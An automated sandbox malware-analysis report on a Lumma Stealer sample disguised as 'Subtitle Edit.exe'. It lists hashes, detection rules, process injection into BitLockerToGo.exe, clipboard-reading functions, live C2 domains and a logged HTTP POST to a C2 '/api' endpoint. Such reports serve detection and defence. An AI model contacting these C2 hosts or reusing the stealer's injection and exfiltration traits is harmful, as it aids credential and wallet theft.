Edit tour

Windows Analysis Report
0Subtitle Edit.exe

Overview

General Information

Sample name:	0Subtitle Edit.exe
Analysis ID:	1501216
MD5:	c304e6d97f3a59f101484c104132c434
SHA1:	02eefa0d5e5578406c37d9088be34c844349df01
SHA256:	2380b9a91c92ba2ab097f7237294d9235970ea3054bd16c7b5aabcbec9c44322
Tags:	exelummalummarcLummaStealerWingo
Infos:

Detection

LummaC

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

0Subtitle Edit.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\0Subtitle Edit.exe" MD5: C304E6D97F3A59F101484C104132C434)

BitLockerToGo.exe (PID: 3992 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000

Suricata Signatures

ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:23.745299+0200
SID:	2055493
Severity:	1
Source Port:	49716
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:23.086805+0200
SID:	2055493
Severity:	1
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) - Source IP: 192.168.2.6 - Destination IP: 1.1.1.1

Timestamp:	2024-08-29T15:40:22.581381+0200
SID:	2055483
Severity:	1
Source Port:	49209
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:23.232493+0200
SID:	2049836
Severity:	1
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:23.232493+0200
SID:	2054653
Severity:	1
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:24.347073+0200
SID:	2049812
Severity:	1
Source Port:	49716
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:24.347073+0200
SID:	2054653
Severity:	1
Source Port:	49716
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:22.112500+0200
SID:	2055489
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:22.563426+0200
SID:	2049836
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:22.563426+0200
SID:	2054653
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) - Source IP: 192.168.2.6 - Destination IP: 1.1.1.1

Timestamp:	2024-08-29T15:40:21.613730+0200
SID:	2055479
Severity:	1
Source Port:	50099
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:21.491116+0200
SID:	2049836
Severity:	1
Source Port:	49713
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-29T15:40:21.491116+0200
SID:	2054653
Severity:	1
Source Port:	49713
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: separateedmsqj.shop

Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.0
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.1
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.2
Source: 0Subtitle Edit.exe	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.00000000028F4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml/3.2
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml/3.3/exr
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/kml/2.2
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.topografix.com/GPX/1/1
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/0z
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/W
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/api
Source: 0Subtitle Edit.exe	String found in binary or memory: https://login.microsoftonline.us/crypto/aes:
Source: BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002847000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://separateedmsqj.shop/api
Source: BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://separateedmsqj.shop/x86
Source: BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/8
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/ddos/glossary/malware/

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0042AAD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042AAD0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0042AAD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042AAD0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040C926	2_2_0040C926
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00435EF8	2_2_00435EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041F840	2_2_0041F840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00407870	2_2_00407870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040F02D	2_2_0040F02D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00421030	2_2_00421030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042F940	2_2_0042F940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00437130	2_2_00437130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004041D0	2_2_004041D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004059E0	2_2_004059E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004071F0	2_2_004071F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041DA50	2_2_0041DA50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00425A69	2_2_00425A69
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040F20D	2_2_0040F20D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00402A20	2_2_00402A20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00436AED	2_2_00436AED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00414AF0	2_2_00414AF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00437280	2_2_00437280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040D286	2_2_0040D286
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041AA90	2_2_0041AA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00437AA2	2_2_00437AA2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00426343	2_2_00426343
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00430BD0	2_2_00430BD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00438C40	2_2_00438C40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00426C28	2_2_00426C28
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004304D0	2_2_004304D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041B4F6	2_2_0041B4F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004064A0	2_2_004064A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041DCB7	2_2_0041DCB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041CD59	2_2_0041CD59
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00404570	2_2_00404570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041F5DB	2_2_0041F5DB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00437590	2_2_00437590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004245A0	2_2_004245A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040DDAC	2_2_0040DDAC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040D620	2_2_0040D620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041D620	2_2_0041D620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401E3A	2_2_00401E3A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401EE5	2_2_00401EE5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041EEFB	2_2_0041EEFB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00437690	2_2_00437690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00413EA7	2_2_00413EA7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408F70	2_2_00408F70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00438F30	2_2_00438F30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00404FD0	2_2_00404FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00419FFF	2_2_00419FFF

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00409A30 appears 49 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00417E90 appears 136 times

Source: 0Subtitle Edit.exe, 00000000.00000002.2281871181.0000000001BBD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs 0Subtitle Edit.exe
Source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 0Subtitle Edit.exe
Source: 0Subtitle Edit.exe	Binary or memory string: OriginalFileName vs 0Subtitle Edit.exe

Source: 0Subtitle Edit.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: 0Subtitle Edit.exe

Binary string: expected '/' for commentinvalid field number: %dmismatching enum lengths\Device\NamedPipe\cygwinunknown compression typecould not resolve %q: %vgoogle.protobuf.DurationMESSAGE_ENCODING_UNKNOWNSouth Sudan Standard TimeUS Mountain Standard TimeMiddle East Standard TimeTransbaikal Standard TimeW. Mongolia Standard TimeAfghanistan Standard TimeNorth Korea Standard TimeUlaanbaatar Standard TimeVladivostok Standard TimeAUS Central Standard TimeAUS Eastern Standard TimeKaliningrad Standard TimeNew Zealand Standard Time2006-01-02T15:04:05Z07:00number of sections is 10+LPSAFEARRAY_UserUnmarshalGetRecordInfoFromTypeInfoarray index out of bounds!#$%&'()-@^_`{}~+,.;=[]\/ARM Thumb-2 little endianMIPS little-endian WCE v2Chinese (Simplified) (zh)Mongolian (Cyrillic) (mn)Bangla Bangladesh (bn-BD)Bosnian (Latin) (bs-Latn)Central Kurdish (ku-Arab)Dari Afghanistan (prs-AF)Dutch Netherlands (nl-NL)English Australia (en-AU)English Hong Kong (en-HK)English Singapore (en-SG)French Caribbean (fr-029)French Congo, Drc (fr-CD)French Luxembourg (fr-LU)German Luxembourg (de-LU)Hungarian Hungary (hu-HU)Icelandic Iceland (is-IS)Kazakh Kazakhstan (kk-KZ)Kyrgyz Kyrgyzstan (ky-KG)Maori New Zealand (mi-NZ)Mapudungun Chile (arn-CL)Portuguese Brazil (pt-BR)Serbian (Latin) (sr-Latn)Setswana Botswana (tn-BW)Sinhala Sri Lanka (si-LK)Spanish Argentina (es-AR)Spanish Guatemala (es-GT)Spanish Nicaragua (es-NI)Tigrinya Ethiopia (ti-ET)Ukrainian Ukraine (uk-UA)Zulu South Africa (zu-ZA)` Contents are null-bytesresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProcThreadAttributegoroutine profile cleanupchansend: spurious wakeupruntime

Source: classification engine

Classification label: mal92.evad.winEXE@3/0@3/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00428637 CoCreateInstance,

2_2_00428637

Source: 0Subtitle Edit.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0Subtitle Edit.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0Subtitle Edit.exe

ReversingLabs: Detection: 34%

Source: 0Subtitle Edit.exe	String found in binary or memory: [38;5;%dmconsistsofconsistsOfissubsetofisSubsetOfBeforeEachAfterSuiteNode (End) for type but have impossibleUser-AgentConnectionlocal-addrimage/webpimage/jpegaudio/aiffaudio/mpegaudio/midiaudio/wavevideo/webmfont/woff2RST_STREAMEND_STREAMSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%d:authorityset-cookieuser-agentkeep-aliveconnectionequivalentHost: %s
Source: 0Subtitle Edit.exe	String found in binary or memory: ... omitting .WithDeadline(\.+?()\|[]{}^$X-User-DefinedCLICOLOR_FORCE~/.bash_logout~/.kube/configJustBeforeEach> closed by </RequestTimeoutRequestExpiredContent-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM; SameSite=Laxaccept-charsetcontent-length{$} not at endempty wildcardparsing %q: %wNot Acceptable.in-addr.arpa.unknown mode: bad record MACControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWprefix length not an ip:portinvalid Prefixmime/multipartzero parameterformnovalidate$htmltemplate_ / %s */null missing quotesObjectItem: %s%04d-%02d-%02d%02d:%02d:%02ddocument startsequence startlen of type %sInstEmptyWidth" out of rangeApplyFunction;DifferentialD;DoubleLeftTee;DoubleUpArrow;LeftTeeVector;LeftVectorBar;LessFullEqual;LongLeftArrow;Longleftarrow;NotTildeEqual;NotTildeTilde;Poincareplane;PrecedesEqual;PrecedesTilde;RightArrowBar;RightTeeArrow;RightTriangle;RightUpVector;SucceedsEqual;SucceedsTilde;SupersetEqual;UpEquilibrium;VerticalTilde;VeryThinSpace;bigtriangleup;blacktriangle;divideontimes;fallingdotseq;hookleftarrow;leftarrowtail;leftharpoonup;longleftarrow;looparrowleft;measuredangle;ntriangleleft;shortparallel;smallsetminus;triangleright;upharpoonleft;NotEqualTilde;varsubsetneqq;varsupsetneqq;^[a-zA-Z0-9]+$^[0-9a-f]{32}$^[0-9a-f]{64}$^[0-9a-f]{96}$^[0-9a-f]{40}$^[0-9a-f]{48}$eq_ignore_casene_ignore_caseEC PRIVATE KEYSubConn(id:%d)grpc-go/1.65.0"OUT_OF_RANGE"ALREADY_EXISTSAccept-CharsetDkim-Signatureneed more dataREQUEST_METHODRCodeNameErrorResourceHeaderunknown node: expected 'inf'expected 'nan'reserved_rangefield_presenceimage/x-ms-bmpaudio/musepackaudio/vnd.wavevideo/x-ms-asfvideo/x-ms-wmvimage/vnd.djvuplugin startedunknown ID: %vhealth_service%s Channel #%dgrpc-trace-bintoo_many_pingsAuthInfo: '%s'show_sensitivecloud.adc-e.ukcsp.hci.ic.govap-northeast-1ap-northeast-2ap-northeast-3ap-southeast-1ap-southeast-2ap-southeast-3ap-southeast-4Europe (Milan)Europe (Spain)Europe (Paris)US East (Ohio)fips-ca-west-1fips-us-east-1fips-us-east-2fips-us-west-1fips-us-west-2ca-west-1-fipsus-east-1-fipsus-east-2-fipsus-west-1-fipsus-west-2-fipsamplifybackendapi.ecr-publicbackup-gatewayclouddirectorycloudformationlocalhost:8000edge.sagemakerfips-ap-east-1fips-eu-west-1fips-eu-west-2fips-eu-west-3fips-sa-east-1emr-containersemr-serverlessprod-ca-west-1prod-us-east-1prod-us-east-2prod-us-west-1prod-us-west-2identity-chimeiotthingsgraphapi-ap-south-1data-eu-west-1data-us-east-1data-us-west-2kendra-rankingap-east-1-fipseu-west-1-fipseu-west-2-fipseu-west-3-fipssa-east-1-fipslookoutmetricsmediapackagev2meetings-chimenetworkmanagerroute53domainsruntime-v2-lexsecretsmanagerserverlessreposervicecatalogsimspaceweaverstoragegatewayworkspaces-webcn-northwest-1api-cn-north-1aws-iso-globalus-isob-east-1eu-isoe-west-1^cn\-
Source: 0Subtitle Edit.exe	String found in binary or memory: [0m[%04d]%s %-44s GetConsoleScreenBufferInfoFillConsoleOutputAttributeencountered a cycle via %snet/http: request canceledhttp: invalid cookie valueduplicate pseudo-header %qhttp2: Framer %p: wrote %vframe_windowupdate_bad_lenframe_priority_zero_streamduplicate wildcard name %qliterals differ: %q and %qmalformed HTTP status codeHTTP Version Not Supportedcannot marshal DNS messageunexpected type in connecttoo many colons in addressAs4 called on IPv6 addressSRV header name is invalidunclosed criterion bracketcriterion lacks equal signbad certificate hash valueECDSA verification failureGetSecurityDescriptorGroupGetSecurityDescriptorOwnerNotifyServiceStatusChangeWSetSecurityDescriptorGroupSetSecurityDescriptorOwnerCertFindCertificateInStoreFindFirstVolumeMountPointWFindNextChangeNotificationGetProcessWorkingSetSizeExGetSystemWindowsDirectoryWQueryFullProcessImageNameWSetProcessWorkingSetSizeExRtlNtStatusToDosErrorNoTebSetupDiBuildDriverInfoListprefix length out of rangeecdsa: invalid private keyed25519: bad seed length: invalid port %q after hostcryptobyte: internal error_html_template_attrescaper_html_template_htmlescapertemplate escaped correctlyno templates in name spaceinvalid date-time timezoneunknown line break settingfound undefined tag handlewhile parsing a block nodeinvalid character sequencewhile scanning a directiveinvalid value; expected %sexpected integer; found %sexpected complex; found %stoo many slice indexes: %dnon-function %s of type %snon-comparable type %s: %vgob: local interface type hexcolor\|rgb\|rgba\|hsl\|hsla^[-+]?[0-9]+(?:\.[0-9]+)?$^(9694[1-4])([ \-]\d{4})?$iso3166_1_alpha_numeric_euBad field name provided %stimeout waiting for acceptccBalancerWrapper: closingparsed dial target is: %#vHealth checking failed: %vid (%v) <= evictCount (%v)malformed chunked encodingsegment prefix is reservedchacha20: wrong nonce sizechacha20: counter overflowunterminated quoted stringunexpected . after term %qinline table is incompleteapplication/x-ms-installerapplication/vnd.ms-outlookapplication/x-unix-archiveapplication/vnd.adobe.xfdfurn:ietf:params:scim:%s:%sduplicate stream initiatedthe connection is drainingtransport closed by clientmalformed grpc-timeout: %vrequest is done processingDrain() is not implementedgrpc-previous-rpc-attemptsGRPC_GO_LOG_SEVERITY_LEVEL2006/01/02 15:04:05.000000appmesh.af-south-1.api.awsappmesh.ap-south-1.api.awsappmesh.eu-north-1.api.awsappmesh.eu-south-1.api.awsappmesh.me-south-1.api.awsbedrock-runtime-ap-south-1ce.us-east-1.amazonaws.comdatazone.ap-east-1.api.awsdatazone.ca-west-1.api.awsdatazone.eu-west-1.api.awsdatazone.eu-west-2.api.awsdatazone.eu-west-3.api.awsdatazone.sa-east-1.api.awsdatazone.us-east-1.api.awsdatazone.us-east-2.api.awsdatazone.us-west-1.api.awsdatazone.us-west-2.api.awseks-auth.ap-east-1.api.awseks-auth.ca-west-1.api.awseks-auth.eu-west-1.api.awseks-auth.eu-west-2.api.awseks-auth.eu-west-3.api.awseks-auth.sa-east-1.api.awseks-auth.us-east-1.api.awseks-auth.us-east-2.api.awseks-auth.us-west-1
